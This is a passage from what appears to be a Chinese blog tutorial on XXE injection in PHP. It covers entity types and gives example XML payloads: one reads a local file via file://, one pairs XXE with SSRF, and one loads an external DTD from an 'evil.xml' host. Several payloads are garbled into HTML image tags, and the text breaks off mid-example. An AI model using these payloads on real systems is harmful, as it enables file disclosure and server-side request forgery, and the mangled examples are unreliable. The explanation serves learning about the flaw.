我正在参加中秋创意投稿大赛,详情请看:中秋创意投稿大赛 0x01:知识准备
XXE即XML External Entity Injection,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml\\\_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml\\\_load_string()
XML实体分为四种:字符实体,命名实体,外部实体,参数实体
1、命名实体写法:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ANY \\\[
<!ENTITY xxe SYSTEM "file:///c://test/1.txt" >\\\]>
<value>&xxe;</value>
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ANY \\\[
<<img src="http://otherhost/xxxx.php" >\\\]> " style="margin: auto" />
<value>&xxe;</value>
可以用做xxe+ssrf2、命名实体+外部实体写法:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root \\\[
<<img src="http://localhost:88/evil.xml"" style="margin: auto" />
\\\]>
<value>&dtd;</value>
这种命名实体调用外部实体,发现evil.xml中不能定义实体,否则解析不了,感觉命名实体好鸡肋,参数实体就好用很多3、第一种命名实体+外部实体+参数实体写法:
<